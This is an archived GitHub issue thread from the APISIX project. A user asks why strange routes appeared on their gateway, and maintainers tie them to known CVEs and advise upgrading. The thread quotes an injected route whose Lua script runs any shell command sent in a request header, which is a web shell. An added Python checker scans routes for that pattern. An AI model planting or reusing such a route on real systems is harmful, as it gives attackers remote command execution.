Posted to notifications@apisix.apache.org by GitBox <gi...@apache.org> on 2022/03/17 04:16:15 UTC

[GitHub] [apisix] qwzhou89 opened a new issue #6638: help request: Why has apisix added some strange routes?

qwzhou89 opened a new issue #6638:
URL: https://github.com/apache/apisix/issues/6638


   ### Description
   
   Today I found some strange routes when I looked at the full routing on the apisix dashboard, as shown below.
   ```json
   {
     "uris": [
       "/NFoRCE"
     ],
     "name": "NFoRCE",
     "methods": [
       "GET",
       "POST",
       "PUT",
       "DELETE",
       "PATCH",
       "HEAD",
       "OPTIONS",
       "CONNECT",
       "TRACE"
     ],
     "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)",
     "status": 0
   }
   ```
   There are 6 or 7 entries; the URIs (/2BYhX6, /i1MIfe, /atfRv3, /0FBGZj, /WORJ3Q, /OxlDL9, /NFoRCE) are all random, the content is similar, and it is a script.
   
   ### Environment
   
   - APISIX version (run `apisix version`):apisix:2.12.0-alpine
   - Operating system (run `uname -a`):Linux tp-apisix-1 4.19.225-0419225-generic #202201110859 SMP Tue Jan 11 14:15:40 UTC 2022 x86_64 Linux
   - OpenResty / Nginx version (run `openresty -V` or `nginx -V`):nginx version: openresty/1.19.9.1
   built by gcc 10.3.1 20210424 (Alpine 10.3.1_git20210424)
   built with OpenSSL 1.1.1g  21 Apr 2020
   TLS SNI support enabled
   configure arguments: --prefix=/usr/local/openresty/nginx --with-cc-opt='-O2 -DAPISIX_BASE_VER=1.19.9.1.3 -DNGX_LUA_ABORT_AT_PANIC -I/usr/local/openresty/zlib/include -I/usr/local/openresty/pcre/include -I/usr/local/openresty/openssl111/include' --add-module=../ngx_devel_kit-0.3.1 --add-module=../echo-nginx-module-0.62 --add-module=../xss-nginx-module-0.06 --add-module=../ngx_coolkit-0.2 --add-module=../set-misc-nginx-module-0.32 --add-module=../form-input-nginx-module-0.12 --add-module=../encrypted-session-nginx-module-0.08 --add-module=../srcache-nginx-module-0.32 --add-module=../ngx_lua-0.10.20 --add-module=../ngx_lua_upstream-0.07 --add-module=../headers-more-nginx-module-0.33 --add-module=../array-var-nginx-module-0.05 --add-module=../memc-nginx-module-0.19 --add-module=../redis2-nginx-module-0.15 --add-module=../redis-nginx-module-0.3.7 --add-module=../ngx_stream_lua-0.0.10 --with-ld-opt='-Wl,-rpath,/usr/local/openresty/luajit/lib -Wl,-rpath,/usr/local/openresty/wasmtime-c-api/lib -L/usr/local/openresty/zlib/lib -L/usr/local/openresty/pcre/lib -L/usr/local/openresty/openssl111/lib -Wl,-rpath,/usr/local/openresty/zlib/lib:/usr/local/openresty/pcre/lib:/usr/local/openresty/openssl111/lib' --add-module=/tmp/tmp.I9j9kfjRTW/openresty-1.19.9.1/../mod_dubbo --add-module=/tmp/tmp.I9j9kfjRTW/openresty-1.19.9.1/../ngx_multi_upstream_module --add-module=/tmp/tmp.I9j9kfjRTW/openresty-1.19.9.1/../apisix-nginx-module --add-module=/tmp/tmp.I9j9kfjRTW/openresty-1.19.9.1/../apisix-nginx-module/src/stream --add-module=/tmp/tmp.I9j9kfjRTW/openresty-1.19.9.1/../wasm-nginx-module --add-module=/tmp/tmp.I9j9kfjRTW/openresty-1.19.9.1/../lua-var-nginx-module --with-poll_module --with-pcre-jit --with-stream --with-stream_ssl_module --with-stream_ssl_preread_module --with-http_v2_module --without-mail_pop3_module --without-mail_imap_module --without-mail_smtp_module --with-http_stub_status_module --with-http_realip_module --with-http_addition_module --with-http_auth_request_module --with-http_secure_link_module --with-http_random_index_module --with-http_gzip_static_module --with-http_sub_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-threads --with-compat --with-stream --with-http_ssl_module
   - etcd version, if relevant (run `curl http://127.0.0.1:9090/v1/server_info`):
   - APISIX Dashboard version, if relevant:2.10.1-alpine
   - Plugin runner version, for issues related to plugin runners:
   - LuaRocks version, for installation issues (run `luarocks --version`):/usr/local/bin/luarocks 3.8.0
   


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@apisix.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org
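
A defender's check for the routes reported above, as an added example that is not part of the original thread or APISIX's own code: it scans exported route objects, shaped like the one quoted in the issue, for `script` fields that run OS commands and for the name/URI pattern the reporter lists. The function names, the heuristics and the ordinary `orders` route are assumptions made for illustration.

```python
import re

# Lua calls that spawn OS commands; io.popen is the one seen in the issue.
EXEC_CALLS = re.compile(r"\b(?:io\.popen|os\.execute)\s*\(")
# OpenResty calls that read client-controlled request data.
REQUEST_INPUT = re.compile(r"ngx\.req\.get_(?:headers|uri_args|post_args|body_data)")


def looks_random(segment):
    """Six ASCII alphanumerics mixing at least two of upper/lower/digit."""
    if not re.fullmatch(r"[A-Za-z0-9]{6}", segment):
        return False
    kinds = (str.isupper, str.islower, str.isdigit)
    return sum(any(k(c) for c in segment) for k in kinds) >= 2


def audit_route(route):
    """Return the reasons a route object looks injected (empty if none)."""
    reasons = []
    script = route.get("script")
    if isinstance(script, str) and EXEC_CALLS.search(script):
        reasons.append("script runs OS commands")
        if REQUEST_INPUT.search(script):
            reasons.append("command is built from request data")
    uris = list(route.get("uris") or [])
    if route.get("uri"):
        uris.append(route["uri"])
    name = route.get("name")
    if any(u == f"/{name}" and looks_random(u[1:]) for u in uris):
        reasons.append("name mirrors a random-looking 6-character URI")
    return reasons


def audit_routes(routes):
    """Map route name -> reasons, for flagged routes only."""
    return {r.get("name", "?"): why for r in routes if (why := audit_route(r))}


# Constructed sample: the route quoted in the issue plus an ordinary route.
SAMPLE_ROUTES = [
    {"uris": ["/NFoRCE"], "name": "NFoRCE", "methods": ["GET", "POST"],
     "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n"
               " local output = file:read('*all') \n file:close() \n ngx.say(output)",
     "status": 0},
    {"uri": "/orders", "name": "orders", "methods": ["GET"],
     "upstream": {"type": "roundrobin", "nodes": {"10.0.0.5:8080": 1}}},
]

if __name__ == "__main__":
    for name, why in audit_routes(SAMPLE_ROUTES).items():
        print(f"{name}: {'; '.join(why)}")
```

The naming heuristic is a weak signal on its own; a `script` that runs OS commands is the finding to act on.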



[GitHub] [apisix] leslie-tsang edited a comment on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.
leslie-tsang edited a comment on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1074707109


   Thanks for your patience. APISIX `2.12.0` is affected by [CVE-2022-24112](https://github.com/advisories/GHSA-2vc7-6w39-6rh2). Here is a [Fix PR](https://github.com/apache/apisix/pull/6208) for it.
   
   Please upgrade your version of APISIX to test if it works.





[GitHub] [apisix] leslie-tsang commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.
leslie-tsang commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1070382664


   Hello there, there are some checkpoints to check out:
   1. Have you changed the password of the apisix-dashboard user administrator?
   2. Is apisix-dashboard exposed to the public network?





[GitHub] [apisix] leslie-tsang commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.
leslie-tsang commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1074913087


   @qwzhou89 Does it solve your problem?
   > Some link has been updated :)





[GitHub] [apisix] qwzhou89 commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.
qwzhou89 commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1070360480


   > Hello there, it seems you have run into [CVE-2021-45232](https://github.com/advisories/GHSA-wcxq-f256-53xp). You can follow the [issue](https://github.com/apache/apisix-dashboard/issues/2275) to deal with it.
   
   But my version of APISIX Dashboard is already 2.10.1-alpine
   





[GitHub] [apisix] qwzhou89 commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.
qwzhou89 commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1070473577


   > Hello there, there are some checkpoints to check out:
   > 
   > 1. Have you changed the password of the apisix-dashboard user administrator?

   Yes, I have changed the password of the apisix-dashboard user admin.

   > 2. Is apisix-dashboard exposed to the public network?

   Yes, I use a route to expose apisix-dashboard to the public network.
   
   





[GitHub] [apisix] leslie-tsang commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.
leslie-tsang commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1070312906


   Hello there, it seems you have run into CVE-2021-45232. You can follow the [issue](https://github.com/apache/apisix-dashboard/issues/2275) to deal with it.





[GitHub] [apisix] leslie-tsang commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.
leslie-tsang commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1074707109


   Thanks for your patience. APISIX `2.12.0` is affected by [CVE-2022-24112](https://github.com/advisories/GHSA-2vc7-6w39-6rh2). Here is a [Fix PR](https://github.com/apache/apisix/pull/6251) for it.
   
   Please upgrade your version of APISIX to test if it works.





[GitHub] [apisix] leslie-tsang commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.
leslie-tsang commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1074828876


   > Does it mean that I should upgrade to 2.12.1?
   
   There are two ways to deal with it:
   1. Upgrade APISIX to `2.12.1`.
   2. Disable `batch-request` plugin as #6251 does.
   
   > Also, is there any way to do a smooth upgrade?
   
   No, this is not related to the Nginx hot upgrade. AFAIK, a reboot is needed.





[GitHub] [apisix] leslie-tsang commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.
leslie-tsang commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1080075029


   Considered resolved due to lack of feedback. Feel free to reopen it if needed.





[GitHub] [apisix] qwzhou89 commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.
qwzhou89 commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1074802564


   > Thanks for your patience. APISIX `2.12.0` is affected by [CVE-2022-24112](https://github.com/advisories/GHSA-2vc7-6w39-6rh2). Here is a [Fix PR](https://github.com/apache/apisix/pull/6251) for it.
   > 
   > Please upgrade your version of APISIX to test if it works.
   
   Does it mean that I should upgrade to 2.12.1?
   Also, is there any way to do a smooth upgrade?
   Just like nginx hot upgrade, replace nginx binary, then kill -USR2 PID, kill -WINCH PID





[GitHub] [apisix] leslie-tsang closed issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.
leslie-tsang closed issue #6638:
URL: https://github.com/apache/apisix/issues/6638


   





[GitHub] [apisix] qwzhou89 edited a comment on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.
qwzhou89 edited a comment on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1070473577


   > Hello there, there are some checkpoints to check out:
   > 
   > 1. Have you changed the password of the apisix-dashboard user administrator?
   > 2. Is apisix-dashboard exposed to the public network?
   
   1. Yes, I have changed the password of the apisix-dashboard user admin.
   2. Yes, I use a route to expose apisix-dashboard to the public network.
   





[GitHub] [apisix] leslie-tsang edited a comment on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.
leslie-tsang edited a comment on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1074828876


   > Does it mean that I should upgrade to 2.12.1?
   
   There are two ways to deal with it:
   1. Upgrade APISIX to `2.12.1`.
   2. Disable `batch-request` plugin as #6251 does.
   
   > Also, is there any way to do a smooth upgrade?
   
   No, this is not related to the Nginx hot upgrade. AFAIK, a reboot is needed.





[GitHub] [apisix] leslie-tsang edited a comment on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.
leslie-tsang edited a comment on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1074828876


   > Does it mean that I should upgrade to 2.12.1?
   
   There are two ways to deal with it:
   1. Upgrade APISIX to `2.12.1`.
   2. Disable `batch-request` plugin as #6208 does.
   
   > Also, is there any way to do a smooth upgrade?
   
   No, this is not related to the Nginx hot upgrade. AFAIK, a reboot is needed.

